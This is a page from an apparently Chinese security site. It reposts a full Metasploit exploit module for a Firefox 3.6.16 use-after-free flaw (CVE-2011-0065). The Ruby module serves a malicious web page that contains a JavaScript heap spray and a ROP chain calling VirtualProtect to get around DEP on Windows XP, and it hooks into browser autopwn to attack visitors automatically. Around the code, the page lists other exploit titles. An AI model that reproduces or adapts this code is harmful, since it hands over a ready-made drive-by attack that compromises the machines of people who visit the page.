首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox 3.6.16 mChannel use after free vulnerability
来源:http://www.metasploit.com 作者:regenrecht 发布时间:2011-08-11  

##
# $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({
  :ua_name => HttpClients::FF,
  :ua_minver => "3.6.16",
  :ua_maxver => "3.6.16",
  :os_name => OperatingSystems::WINDOWS,
  :javascript => true,
  :rank => NormalRanking,
 })

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
   'Description'    => %q{
     This module exploits an use after free vulnerability in Mozilla
    Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
    OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
    becomes a dangling pointer and can be reused when setting the OBJECTs
    data attribute. (Discovered by regenrecht). This module uses heapspray
    with a minimal ROP chain to bypass DEP on Windows XP SP3
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'regenrecht',  # discovery
     'Rh0'          # metasploit module
    ],
   'Version'        => "$Revision: 13507 $",
   'References'     =>
    [
     ['CVE',    '2011-0065'],
     ['OSVDB',  '72085'],
     ['URL',    'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
     ['URL',    'http://www.mozilla.org/security/announce/2010/mfsa2011-13.html']
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space' => 1024,
    },
   'Targets'        =>
    [
     [
      'Firefox 3.6.16 on Windows XP SP3',
      {
       'Platform' => 'win',
       'Arch' => ARCH_X86,
      }
     ],
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'May 10 2011'
   ))
 end

 def on_request_uri(cli, request)
  # Re-generate the payload
  return if ((p = regenerate_payload(cli).encoded) == nil)

  print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
  send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

  # Handle the payload
  handler(cli)
 end

 def generate_html(payload)
  # DEP bypass using xul.dll
  custom_stack = [
   0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
   0x7c801ad4, # VirtualProtect
   0xbeeff00d,
   0xbeeff00d,
   0x1003876B, # jmp esp
   0x0c0c0048, # start address
   0x00000400, # size 1024
   0x00000040, # Page EXECUTE_READ_WRITE
   0x0c0c0c00  # old protection
  ].pack("V*")

  payload_buf  = ''
  payload_buf << custom_stack
  payload_buf << payload
  escaped_payload = Rex::Text.to_unescape(payload_buf)

  #Random JavaScript variable names
  js_element_name      = rand_text_alpha(rand(10) + 5)
  js_obj_addr_name     = rand_text_alpha(rand(10) + 5)
  js_sc_name           = rand_text_alpha(rand(10) + 5)
  js_ret_addr_name     = rand_text_alpha(rand(10) + 5)
  js_chunk_name        = rand_text_alpha(rand(10) + 5)
  js_final_chunk_name  = rand_text_alpha(rand(10) + 5)
  js_block_name        = rand_text_alpha(rand(10) + 5)

  #Reference: adobe_flashplayer_newfunction.rb
  custom_js = <<-JS
  #{js_element_name} = document.getElementById("d");
  #{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
  #{js_obj_addr_name} = unescape("\\x0c%u0c0c");

  var #{js_sc_name} = unescape("#{escaped_payload}");
  var #{js_ret_addr_name} = unescape("%u0024%u0c0c");
  while(#{js_ret_addr_name}.length+20+8 < 0x100000) {#{js_ret_addr_name} += #{js_ret_addr_name};}
  var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,(0x48-0x24)/2);
  #{js_chunk_name} += #{js_sc_name};
  #{js_chunk_name} += #{js_ret_addr_name};
  var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2);
  while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};}
  var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - (0x1020-0x08)/2);
  array = new Array()
  for (n=0;n<0x1f0;n++){
   array[n] = #{js_block_name} + #{js_sc_name};
  }

  #{js_element_name}.data = "";
  JS

  #Remove the extra tabs
  custom_js = custom_js.gsub(/^\t\t/, '')

  html = <<-HTML
  <html>
  <body>
   <object id="d"><object>
   <script type="text/javascript">
   #{custom_js}
   </script>
  </body>
  </html>
  HTML

  return html
 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BisonFTP Server <=v3.5 Remote
·HP Data Protector Remote Root
·A-PDF All to MP3 v2.3.0 Univer
·iPhone/iPad Phone Drive 1.1.1
·FCKeditor all versian Arbitrar
·Excel SLYK Format Parsing Buff
·MP3 CD Converter Professional
·Acoustica Mixcraft v1.00 Local
·LiteServe 2.81 PASV Command De
·PhpMyadmin XSRF Vuln (Execute
·HP JetDirect PJL Query Executi
·Allomani Songs & Clips 2.x (ms
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved